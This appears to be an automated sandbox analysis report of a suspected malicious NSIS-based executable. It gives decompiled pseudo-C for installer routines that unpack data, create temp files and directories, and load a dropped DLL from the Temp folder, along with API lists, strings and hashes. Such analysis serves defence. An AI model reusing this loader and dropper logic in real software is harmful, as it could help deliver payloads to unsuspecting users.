                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll$uvlcopdlxoed
                                                                                    • API String ID: 1941528284-2640653109
                                                                                    • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                                    • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                                    • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                                    • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004030D8, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403300( *0x42f498 + _t62);
				}
				if(E004032EA( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004032EA(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004032EA(0x41d448, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004032EA(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406625(0x40b880);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x422448
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040521E(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x422448
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405D37(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                                                    0x004030e0
                                                                                    0x004030e4
                                                                                    0x004030e7
                                                                                    0x004030ec
                                                                                    0x004030ee
                                                                                    0x004030ee
                                                                                    0x004030f5
                                                                                    0x004030f9
                                                                                    0x004030fe
                                                                                    0x00403100
                                                                                    0x00403100
                                                                                    0x00403107
                                                                                    0x0040310c
                                                                                    0x00403117
                                                                                    0x00403117
                                                                                    0x00403129
                                                                                    0x004032d8
                                                                                    0x004032d8
                                                                                    0x00000000
                                                                                    0x0040312f
                                                                                    0x00403133
                                                                                    0x00403285
                                                                                    0x004032c8
                                                                                    0x004032ca
                                                                                    0x004032ca
                                                                                    0x004032d6
                                                                                    0x004032dd
                                                                                    0x004032e0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004032d6
                                                                                    0x0040328a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040328c
                                                                                    0x0040328f
                                                                                    0x00403292
                                                                                    0x00403295
                                                                                    0x00403297
                                                                                    0x00403297
                                                                                    0x004032a7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004032ae
                                                                                    0x004032b5
                                                                                    0x0040327f
                                                                                    0x0040327f
                                                                                    0x004032da
                                                                                    0x004032da
                                                                                    0x00000000
                                                                                    0x004032da
                                                                                    0x004032b7
                                                                                    0x004032ba
                                                                                    0x004032c1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004032c3
                                                                                    0x00000000
                                                                                    0x0040328f
                                                                                    0x0040313f
                                                                                    0x00403141
                                                                                    0x00403148
                                                                                    0x0040314f
                                                                                    0x0040314f
                                                                                    0x00403156
                                                                                    0x0040315e
                                                                                    0x00403168
                                                                                    0x0040316d
                                                                                    0x00403175
                                                                                    0x0040317f
                                                                                    0x00403182
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403188
                                                                                    0x00403188
                                                                                    0x00403188
                                                                                    0x00403190
                                                                                    0x00403192
                                                                                    0x00403192
                                                                                    0x004031a3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031a9
                                                                                    0x004031ac
                                                                                    0x004031b2
                                                                                    0x004031b8
                                                                                    0x004031b8
                                                                                    0x004031c3
                                                                                    0x004031c9
                                                                                    0x004031ce
                                                                                    0x004031d5
                                                                                    0x004031d8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031de
                                                                                    0x004031e4
                                                                                    0x004031e6
                                                                                    0x004031ef
                                                                                    0x004031f1
                                                                                    0x0040321f
                                                                                    0x00403225
                                                                                    0x0040322e
                                                                                    0x00403233
                                                                                    0x00403233
                                                                                    0x00403238
                                                                                    0x00403273
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040323a
                                                                                    0x0040323e
                                                                                    0x00403255
                                                                                    0x0040325a
                                                                                    0x0040325d
                                                                                    0x00403260
                                                                                    0x00403263
                                                                                    0x00403267
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040326d
                                                                                    0x00403247
                                                                                    0x0040324e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403250
                                                                                    0x00000000
                                                                                    0x00403250
                                                                                    0x00403238
                                                                                    0x0040327b
                                                                                    0x00000000
                                                                                    0x0040327b
                                                                                    0x00000000
                                                                                    0x00403188

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountTick$wsprintf
                                                                                    • String ID: ... %d%%$H$B
                                                                                    • API String ID: 551687249-630640294
                                                                                    • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                                    • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                                    • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                                    • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004056E4, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004056E4(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                    0x004056ef
                                                                                    0x004056f3
                                                                                    0x004056f6
                                                                                    0x004056fc
                                                                                    0x00405700
                                                                                    0x00405704
                                                                                    0x0040570c
                                                                                    0x00405713
                                                                                    0x00405719
                                                                                    0x00405720
                                                                                    0x00405727
                                                                                    0x0040572f
                                                                                    0x00405731
                                                                                    0x00000000
                                                                                    0x00405731
                                                                                    0x0040573b
                                                                                    0x00405742
                                                                                    0x00405758
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040575a
                                                                                    0x0040575e

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                                    • GetLastError.KERNEL32 ref: 0040573B
                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                                    • GetLastError.KERNEL32 ref: 0040575A
                                                                                    Strings
                                                                                    • C:\Users\user\Desktop, xrefs: 004056E4
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                    • API String ID: 3449924974-2028306314
                                                                                    • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                    • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                                    • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                    • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00406492(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                    0x004064a9
                                                                                    0x004064b2
                                                                                    0x004064b4
                                                                                    0x004064b4
                                                                                    0x004064b8
                                                                                    0x004064ca
                                                                                    0x004064c4
                                                                                    0x004064c4
                                                                                    0x004064c4
                                                                                    0x004064ce
                                                                                    0x004064e2
                                                                                    0x004064f6
                                                                                    0x004064fd

                                                                                    APIs
                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                                    • wsprintfA.USER32 ref: 004064E2
                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                    • API String ID: 2200240437-4240819195
                                                                                    • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                    • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                                    • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                    • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                                    0x00405cc3
                                                                                    0x00405cc9
                                                                                    0x00405cca
                                                                                    0x00405cca
                                                                                    0x00405ccf
                                                                                    0x00405cd0
                                                                                    0x00405cd3
                                                                                    0x00405cdd
                                                                                    0x00405cea
                                                                                    0x00405ced
                                                                                    0x00405cf5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405cf9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405cfb
                                                                                    0x00000000
                                                                                    0x00405cfb
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00405CD3
                                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                                    Strings
                                                                                    • nsa, xrefs: 00405CCA
                                                                                    • "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" , xrefs: 00405CBF
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-3163824894
                                                                                    • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                    • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                                    • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                    • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 60%
                                                                                    			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040521E(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                    0x0040209d
                                                                                    0x0040209d
                                                                                    0x004020a2
                                                                                    0x004020a9
                                                                                    0x00402164
                                                                                    0x004022dd
                                                                                    0x004022dd
                                                                                    0x00402a5a
                                                                                    0x00402a5d
                                                                                    0x00402a69
                                                                                    0x00402a69
                                                                                    0x004020b8
                                                                                    0x004020c2
                                                                                    0x004020c5
                                                                                    0x004020d4
                                                                                    0x004020d8
                                                                                    0x004020de
                                                                                    0x004020e2
                                                                                    0x0040215d
                                                                                    0x00000000
                                                                                    0x0040215d
                                                                                    0x004020e4
                                                                                    0x004020ed
                                                                                    0x004020f1
                                                                                    0x00402135
                                                                                    0x004020f3
                                                                                    0x004020f6
                                                                                    0x004020f9
                                                                                    0x00402129
                                                                                    0x004020fb
                                                                                    0x004020fe
                                                                                    0x00402107
                                                                                    0x00402109
                                                                                    0x00402109
                                                                                    0x00402107
                                                                                    0x004020f9
                                                                                    0x0040213d
                                                                                    0x00402152
                                                                                    0x00402152
                                                                                    0x00000000
                                                                                    0x0040213d
                                                                                    0x004020c8
                                                                                    0x004020ce
                                                                                    0x004020d2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,73BCEA30), ref: 0040527A
                                                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2987980305-0
                                                                                    • Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                                                    • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                                    • Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                                                    • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 87%
                                                                                    			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B28(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405ABA(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405761(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056E4(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                    0x004015bb
                                                                                    0x004015c2
                                                                                    0x004015c5
                                                                                    0x004015ca
                                                                                    0x004015ce
                                                                                    0x004015d0
                                                                                    0x004015d8
                                                                                    0x004015da
                                                                                    0x004015dc
                                                                                    0x004015e0
                                                                                    0x004015e3
                                                                                    0x004015fb
                                                                                    0x004015fc
                                                                                    0x004015e5
                                                                                    0x004015e5
                                                                                    0x004015e8
                                                                                    0x00000000
                                                                                    0x004015f3
                                                                                    0x004015f4
                                                                                    0x004015f4
                                                                                    0x004015e8
                                                                                    0x00401603
                                                                                    0x0040160a
                                                                                    0x00401617
                                                                                    0x00401617
                                                                                    0x0040160c
                                                                                    0x0040160d
                                                                                    0x00401615
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401615
                                                                                    0x0040160a
                                                                                    0x0040161a
                                                                                    0x0040161d
                                                                                    0x0040161f
                                                                                    0x00401620
                                                                                    0x004015d0
                                                                                    0x00401627
                                                                                    0x00401652
                                                                                    0x004022dd
                                                                                    0x00401629
                                                                                    0x0040162b
                                                                                    0x00401636
                                                                                    0x0040163c
                                                                                    0x00401644
                                                                                    0x0040164a
                                                                                    0x0040164a
                                                                                    0x00401644
                                                                                    0x00402a5d
                                                                                    0x00402a69

                                                                                    APIs
